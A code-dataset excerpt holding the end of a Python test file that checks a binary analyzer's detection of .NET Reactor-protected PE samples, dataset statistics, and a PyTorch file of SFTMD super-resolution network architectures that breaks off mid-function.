input=['x86-pe-ff10e014c94cbc89f9e653bc647b6d5a', 'x86-pe-d5a674ff381b95f36f3f4ef3e5a8d0c4-eziriz42']
)
def test_fileinfo_json_output_is_correctly_parsed(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['fileFormat'], 'PE')
self.assertEqual(self.fileinfo.output['dataDirectories']['numberOfDataDirectories'], '16')
self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['index'], '14')
self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['address'], '0')
self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['size'], '0')
self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['type'], 'CLR runtime header')
self.assertEqual(self.fileinfo.output['tools'][0]['name'], 'Eziriz .NET Reactor')
self.assertEqual(self.fileinfo.output['tools'][0]['version'], '4.2')
self.assertEqual(self.fileinfo.output['languages'][0]['name'], 'CIL/.NET')
self.assertTrue(self.fileinfo.output['languages'][0]['bytecode'])
class Eziriz50Test(Test):
settings = TestSettings(
tool='fileinfo',
args='--json --verbose',
input='x86-pe-08f9c6c1cfb53ece69025050c95fcd5e-eziriz5'
)
def test_fileinfo_json_output_is_correctly_parsed(self):
assert self.fileinfo.succeeded
self.assertEqual(self.fileinfo.output['fileFormat'], 'PE')
self.assertEqual(self.fileinfo.output['dataDirectories']['numberOfDataDirectories'], '15')
self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['index'], '14')
self.assertTrue(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['address'] != 0)
self.assertTrue(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['size'] != 0)
self.assertEqual(self.fileinfo.output['dataDirectories']['dataDirectoryEntries'][14]['type'], 'CLR runtime header')
self.assertEqual(self.fileinfo.output['tools'][0]['name'], 'Eziriz .NET Reactor')
self.assertEqual(self.fileinfo.output['tools'][0]['version'], '4.8 - 5.0')
self.assertEqual(self.fileinfo.output['languages'][0]['name'], 'CIL/.NET')
self.assertTrue(self.fileinfo.output['languages'][0]['bytecode'])
| 57.568182
| 123
| 0.69167
| 257
| 2,533
| 6.766537
| 0.237354
| 0.151811
| 0.207016
| 0.248419
| 0.895342
| 0.895342
| 0.894767
| 0.894767
| 0.876941
| 0.79356
| 0
| 0.049636
| 0.133044
| 2,533
| 43
| 124
| 58.906977
| 0.742259
| 0
| 0
| 0.594595
| 0
| 0
| 0.322148
| 0.071062
| 0
| 0
| 0
| 0
| 0.594595
| 1
| 0.054054
| false
| 0
| 0.027027
| 0
| 0.189189
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ff7a35b774cb2375cae41358c19078d6b9f8e8d1
| 49,053
|
py
|
Python
|
superresolution_stage/models/archs/sftmd.py
|
xian1234/SRBuildSeg
|
db16ae2aba6aaa336a0b612446c80b4546b96a1f
|
[
"MIT"
] | 9
|
2021-04-06T12:46:47.000Z
|
2022-03-26T09:10:11.000Z
|
superresolution_stage/models/archs/sftmd.py
|
xian1234/SRBuildSeg
|
db16ae2aba6aaa336a0b612446c80b4546b96a1f
|
[
"MIT"
] | null | null | null |
superresolution_stage/models/archs/sftmd.py
|
xian1234/SRBuildSeg
|
db16ae2aba6aaa336a0b612446c80b4546b96a1f
|
[
"MIT"
] | null | null | null |
""" Architecture for SFTMD """
import functools
import torch
import torch.nn as nn
import torch.nn.functional as F
import models.archs.arch_util as arch_util
import torch.nn.utils.spectral_norm as spectral_norm
class SFTLayer(nn.Module):
def __init__(self, nf=64, n_condition=10):
super(SFTLayer, self).__init__()
# TODO: can use shared convolution layers to save computation
self.mul_conv1 = nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1)
self.mul_conv2 = nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1)
self.add_conv1 = nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1)
self.add_conv2 = nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, features, conditions):
cat_input = torch.cat((features, conditions), dim=1)
mul = torch.sigmoid(self.mul_conv2(self.lrelu(self.mul_conv1(cat_input))))
add = self.add_conv2(self.lrelu(self.add_conv1(cat_input)))
return features * mul + add
class SFTLayer_SN(nn.Module):
def __init__(self, nf=64, n_condition=10, n_power_iterations=1, bias_sn=False):
super(SFTLayer_SN, self).__init__()
# TODO: can use shared convolution layers to save computation
self.mul_conv1 = spectral_norm(
nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
self.mul_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
name='weight', n_power_iterations=n_power_iterations)
self.add_conv1 = spectral_norm(
nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
self.add_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
name='weight', n_power_iterations=n_power_iterations)
if bias_sn:
self.mul_conv1 = spectral_norm(self.mul_conv1, name='bias',
n_power_iterations=n_power_iterations)
self.mul_conv2 = spectral_norm(self.mul_conv2, name='bias',
n_power_iterations=n_power_iterations)
self.add_conv1 = spectral_norm(self.add_conv1, name='bias',
n_power_iterations=n_power_iterations)
self.add_conv2 = spectral_norm(self.add_conv2, name='bias',
n_power_iterations=n_power_iterations)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, features, conditions):
cat_input = torch.cat((features, conditions), dim=1)
mul = torch.sigmoid(self.mul_conv2(self.lrelu(self.mul_conv1(cat_input))))
add = self.add_conv2(self.lrelu(self.add_conv1(cat_input)))
return features * mul + add
class SFTLayer_SN_Norm(nn.Module):
def __init__(self, nf=64, n_condition=10, n_power_iterations=1, norm='batch'):
super(SFTLayer_SN_Norm, self).__init__()
# TODO: can use shared convolution layers to save computation
if norm == 'batch':
norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)
elif norm == 'instance':
norm_layer = functools.partial(nn.InstanceNorm2d, affine=True,
track_running_stats=True)
self.mul_conv1 = spectral_norm(
nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
self.mul_norm1 = norm_layer(num_features=32)
self.mul_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
name='weight', n_power_iterations=n_power_iterations)
self.mul_norm2 = norm_layer(num_features=nf)
self.add_conv1 = spectral_norm(
nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
self.add_norm1 = norm_layer(num_features=32)
self.add_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
name='weight', n_power_iterations=n_power_iterations)
self.add_norm2 = norm_layer(num_features=nf)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, features, conditions):
cat_input = torch.cat((features, conditions), dim=1)
mul = torch.sigmoid(
self.mul_norm2(self.mul_conv2(self.lrelu(self.mul_norm1(self.mul_conv1(cat_input))))))
add = self.add_norm2(self.add_conv2(self.lrelu(self.add_norm1(self.add_conv1(cat_input)))))
return features * mul + add
class SFTLayer_SN_ReLU(nn.Module):
def __init__(self, nf=64, n_condition=10, n_power_iterations=1):
super(SFTLayer_SN_ReLU, self).__init__()
# TODO: can use shared convolution layers to save computation
self.mul_conv1 = spectral_norm(
nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
self.mul_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
name='weight', n_power_iterations=n_power_iterations)
self.add_conv1 = spectral_norm(
nn.Conv2d(nf + n_condition, 32, kernel_size=3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
self.add_conv2 = spectral_norm(nn.Conv2d(32, nf, kernel_size=3, stride=1, padding=1),
name='weight', n_power_iterations=n_power_iterations)
self.relu = nn.ReLU(inplace=True)
def forward(self, features, conditions):
cat_input = torch.cat((features, conditions), dim=1)
mul = torch.sigmoid(self.mul_conv2(self.relu(self.mul_conv1(cat_input))))
add = self.add_conv2(self.relu(self.add_conv1(cat_input)))
return features * mul + add
class SFTResidualBlock(nn.Module):
def __init__(self, nf=64, n_condition=10):
super(SFTResidualBlock, self).__init__()
self.sft1 = SFTLayer(nf=nf, n_condition=n_condition)
self.sft2 = SFTLayer(nf=nf, n_condition=n_condition)
self.conv1 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True)
self.conv2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
arch_util.initialize_weights([self.conv1, self.conv2], 0.1)
def forward(self, features, conditions):
fea = self.lrelu(self.sft1(features, conditions))
fea = self.lrelu(self.sft2(self.conv1(fea), conditions))
fea = self.conv2(fea)
return features + fea
class SFTResidualBlock_SN(nn.Module):
def __init__(self, nf=64, n_condition=10, n_power_iterations=1, bias_sn=False):
super(SFTResidualBlock_SN, self).__init__()
self.sft1 = SFTLayer_SN(nf=nf, n_condition=n_condition)
self.sft2 = SFTLayer_SN(nf=nf, n_condition=n_condition)
self.conv1 = spectral_norm(nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations)
self.conv2 = spectral_norm(nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
if bias_sn:
self.conv1 = spectral_norm(self.conv1, name='bias',
n_power_iterations=n_power_iterations)
self.conv2 = spectral_norm(self.conv2, name='bias',
n_power_iterations=n_power_iterations)
arch_util.initialize_weights([self.conv1, self.conv2], 0.1)
def forward(self, features, conditions):
fea = self.lrelu(self.sft1(features, conditions))
fea = self.lrelu(self.sft2(self.conv1(fea), conditions))
fea = self.conv2(fea)
return features + fea
class SFTResidualBlock_SN_Norm(nn.Module):
def __init__(self, nf=64, n_condition=10, n_power_iterations=1, norm='batch'):
super(SFTResidualBlock_SN_Norm, self).__init__()
if norm == 'batch':
norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)
elif norm == 'instance':
norm_layer = functools.partial(nn.InstanceNorm2d, affine=True,
track_running_stats=True)
self.sft1 = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
n_power_iterations=n_power_iterations, norm=norm)
self.sft2 = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
n_power_iterations=n_power_iterations, norm=norm)
self.conv1 = spectral_norm(nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations)
self.norm1 = norm_layer(num_features=64)
self.conv2 = spectral_norm(nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations)
self.norm2 = norm_layer(num_features=64)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
arch_util.initialize_weights([self.conv1, self.conv2], 0.1)
def forward(self, features, conditions):
fea = self.lrelu(self.sft1(features, conditions))
fea = self.lrelu(self.sft2(self.norm1(self.conv1(fea)), conditions))
fea = self.norm2(self.conv2(fea))
return features + fea
class SFTResidualBlock_SN_ReLU(nn.Module):
def __init__(self, nf=64, n_condition=10, n_power_iterations=1):
super(SFTResidualBlock_SN_ReLU, self).__init__()
self.sft1 = SFTLayer_SN_ReLU(nf=nf, n_condition=n_condition)
self.sft2 = SFTLayer_SN_ReLU(nf=nf, n_condition=n_condition)
self.conv1 = spectral_norm(nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations)
self.conv2 = spectral_norm(nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations)
self.relu = nn.ReLU(inplace=True)
arch_util.initialize_weights([self.conv1, self.conv2], 0.1)
def forward(self, features, conditions):
fea = self.relu(self.sft1(features, conditions))
fea = self.relu(self.sft2(self.conv1(fea), conditions))
fea = self.conv2(fea)
return features + fea
class SFTMD(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
super(SFTMD, self).__init__()
self.n_RB = n_RB
self.conv_first = nn.Conv2d(inc, nf, 3, stride=1, padding=1)
for i in range(n_RB):
self.add_module('SFTRB' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
self.sft_extra = SFTLayer(nf=nf, n_condition=n_condition)
self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
if scale == 4:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, input, kernel_code, spatial=False, extra=False):
_, _, H, W = input.size()
if not spatial:
Bk, Ck = kernel_code.size()
kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea = self.lrelu(self.conv_first(input))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
out = self.conv_final(self.upscale(fea))
if extra:
return out, fea
else:
return out
class SFTMD_Ushape(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
super(SFTMD_Ushape, self).__init__()
self.n_RB = n_RB
self.conv_first = nn.Conv2d(inc, nf, 3, stride=1, padding=1)
# downsample operation
for i in range(n_RB // 2):
self.add_module('SFTRB_down' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
self.mid_layer = SFTResidualBlock(nf=nf, n_condition=n_condition)
# upsample operation
for i in range(n_RB // 2):
self.add_module('SFTRB_up' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
self.sft_extra = SFTLayer(nf=nf, n_condition=n_condition)
self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
if scale == 4:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.max_pool = nn.MaxPool2d(2, 2)
def forward(self, input, kernel_code, spatial=False, extra=False):
_, _, H_in, W_in = input.size()
kernel_code_ori = kernel_code.clone()
# if not spatial:
# Bk, Ck = kernel_code_ori.size()
# kernel_code = kernel_code_ori.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
Bk, Ck = kernel_code_ori.size()
fea = self.lrelu(self.conv_first(input))
fea_sft = fea.clone()
# down_scale
kernel_code_list = []
for i in range(self.n_RB // 2):
H = int(H_in * 2 ** (-1 * i))
W = int(W_in * 2 ** (-1 * i))
kernel_code = kernel_code_ori.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea_sft_x2 = self.__getattr__('SFTRB_down' + str(i))(fea_sft, kernel_code)
fea_sft = self.max_pool(fea_sft_x2)
kernel_code_list.insert(0, kernel_code)
H = int(H_in * 2 ** (-1 * (self.n_RB // 2)))
W = int(W_in * 2 ** (-1 * (self.n_RB // 2)))
kernel_code = kernel_code_ori.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea_sft = self.mid_layer(fea_sft, kernel_code)
#up_scale
for i in range(self.n_RB // 2):
fea_sft = F.interpolate(fea_sft, scale_factor=2, mode='bilinear', align_corners=False)
fea_sft = self.__getattr__('SFTRB_up' + str(i))(fea_sft, kernel_code_list[i])
kernel_code = kernel_code_list[self.n_RB // 2 - 1]
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
out = self.conv_final(self.upscale(fea))
if extra:
return out, fea
else:
return out
class SFTMD_Noise_JPEG(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=12, scale=4, n_RB=16):
super(SFTMD_Noise_JPEG, self).__init__()
self.n_RB = n_RB
self.conv_first = nn.Conv2d(inc, nf, 3, stride=1, padding=1)
for i in range(n_RB):
self.add_module('SFTRB' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
self.sft_extra = SFTLayer(nf=nf, n_condition=n_condition)
self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
if scale == 4:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, input, kernel_code, noise, jpeg, spatial=False, extra=False):
_, _, H, W = input.size()
if not spatial:
codes = torch.cat((kernel_code, noise, jpeg), dim=1)
Bk, Ck = codes.size()
codes = codes.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea = self.lrelu(self.conv_first(input))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, codes)
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(self.sft_extra(fea, codes)))
out = self.conv_final(self.upscale(fea))
if extra:
return out, fea
else:
return out
class SFTMD_SN_Noise_JPEG(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16, n_power_iterations=1,
norm=None, bias_sn=False):
super(SFTMD_SN_Noise_JPEG, self).__init__()
self.n_RB = n_RB
if bias_sn:
print('Bias SN')
self.conv_first = spectral_norm(nn.Conv2d(inc, nf, 3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
if bias_sn:
self.conv_first = spectral_norm(self.conv_first, name='bias',
n_power_iterations=n_power_iterations)
for i in range(n_RB):
if norm is None:
self.add_module('SFTRB' + str(i),
SFTResidualBlock_SN(nf=nf, n_condition=n_condition, bias_sn=False))
else:
self.add_module(
'SFTRB' + str(i),
SFTResidualBlock_SN_Norm(nf=nf, n_condition=n_condition,
n_power_iterations=n_power_iterations, norm=norm))
if norm is None:
self.sft_extra = SFTLayer_SN(nf=nf, n_condition=n_condition, bias_sn=False)
else:
self.sft_extra = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
n_power_iterations=n_power_iterations, norm=norm)
self.conv_extra = spectral_norm(
nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
if bias_sn:
self.conv_extra = spectral_norm(self.conv_extra, name='bias',
n_power_iterations=n_power_iterations)
if scale == 4:
if bias_sn:
self.upscale = nn.Sequential(
spectral_norm(
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1,
bias=True), name='weight',
n_power_iterations=n_power_iterations), name='bias',
n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
spectral_norm(
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1,
bias=True), name='weight',
n_power_iterations=n_power_iterations), name='bias',
n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
if bias_sn:
self.upscale = nn.Sequential(
spectral_norm(
spectral_norm(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1,
bias=True), name='weight',
n_power_iterations=n_power_iterations), name='bias',
n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
spectral_norm(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = spectral_norm(
nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
if bias_sn:
self.conv_final = spectral_norm(self.conv_final, name='bias',
n_power_iterations=n_power_iterations)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, input, kernel_code, noise, jpeg, spatial=False, extra=False):
_, _, H, W = input.size()
if not spatial:
codes = torch.cat((kernel_code, noise, jpeg), dim=1)
Bk, Ck = codes.size()
codes = codes.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea = self.lrelu(self.conv_first(input))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, codes)
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(self.sft_extra(fea, codes)))
out = self.conv_final(self.upscale(fea))
if extra:
return out, fea
else:
return out
class SFTMD_SN(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16, n_power_iterations=1,
norm=None, bias_sn=False):
super(SFTMD_SN, self).__init__()
self.n_RB = n_RB
if bias_sn:
print('Bias SN')
self.conv_first = spectral_norm(nn.Conv2d(inc, nf, 3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
if bias_sn:
self.conv_first = spectral_norm(self.conv_first, name='bias',
n_power_iterations=n_power_iterations)
for i in range(n_RB):
if norm is None:
self.add_module('SFTRB' + str(i), SFTResidualBlock_SN(nf=nf,
n_condition=n_condition, bias_sn=False))
else:
self.add_module(
'SFTRB' + str(i),
SFTResidualBlock_SN_Norm(nf=nf, n_condition=n_condition,
n_power_iterations=n_power_iterations, norm=norm))
if norm is None:
self.sft_extra = SFTLayer_SN(nf=nf, n_condition=n_condition, bias_sn=False)
else:
self.sft_extra = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
n_power_iterations=n_power_iterations, norm=norm)
self.conv_extra = spectral_norm(
nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
if bias_sn:
self.conv_extra = spectral_norm(self.conv_extra, name='bias',
n_power_iterations=n_power_iterations)
if scale == 4:
if bias_sn:
self.upscale = nn.Sequential(
spectral_norm(
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1,
bias=True), name='weight',
n_power_iterations=n_power_iterations), name='bias',
n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
spectral_norm(
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1,
bias=True), name='weight',
n_power_iterations=n_power_iterations), name='bias',
n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
if bias_sn:
self.upscale = nn.Sequential(
spectral_norm(
spectral_norm(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1,
bias=True), name='weight',
n_power_iterations=n_power_iterations), name='bias',
n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
spectral_norm(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = spectral_norm(
nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
if bias_sn:
self.conv_final = spectral_norm(self.conv_final, name='bias',
n_power_iterations=n_power_iterations)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, input, kernel_code, spatial=False, extra=False):
_, _, H, W = input.size()
if not spatial:
Bk, Ck = kernel_code.size()
kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea = self.lrelu(self.conv_first(input))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
out = self.conv_final(self.upscale(fea))
if extra:
return out, fea
else:
return out
class SFTMD_SN_Dropout(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16, n_power_iterations=1,
norm=None, dropSN=True):
super(SFTMD_SN_Dropout, self).__init__()
self.n_RB = n_RB
self.conv_first = spectral_norm(nn.Conv2d(inc, nf, 3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
for i in range(n_RB):
if norm is None:
self.add_module('SFTRB' + str(i), SFTResidualBlock_SN(nf=nf,
n_condition=n_condition))
else:
self.add_module(
'SFTRB' + str(i),
SFTResidualBlock_SN_Norm(nf=nf, n_condition=n_condition,
n_power_iterations=n_power_iterations, norm=norm))
if norm is None:
self.sft_extra = SFTLayer_SN(nf=nf, n_condition=n_condition)
else:
self.sft_extra = SFTLayer_SN_Norm(nf=nf, n_condition=n_condition,
n_power_iterations=n_power_iterations, norm=norm)
if dropSN:
self.conv_extra = spectral_norm(
nn.Conv2d(nf, nf * 2, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
self.conv_extra2 = spectral_norm(
nn.Conv2d(nf * 2, nf, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
else:
self.conv_extra = nn.Conv2d(nf, nf * 2, kernel_size=3, stride=1, padding=1, bias=True)
self.conv_extra2 = nn.Conv2d(nf * 2, nf, kernel_size=3, stride=1, padding=1, bias=True)
self.dropout = nn.Dropout2d(p=0.5, inplace=False)
if scale == 4:
self.upscale = nn.Sequential(
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
spectral_norm(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = spectral_norm(
nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, input, kernel_code):
_, _, H, W = input.size()
Bk, Ck = kernel_code.size()
